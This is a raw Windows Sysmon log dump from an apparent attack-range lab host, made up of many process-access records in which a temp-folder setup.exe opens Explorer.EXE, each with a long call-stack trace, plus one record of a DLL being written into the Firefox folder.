13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll2021-01-18 13:59:52.208 10341000x800000000000000014480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 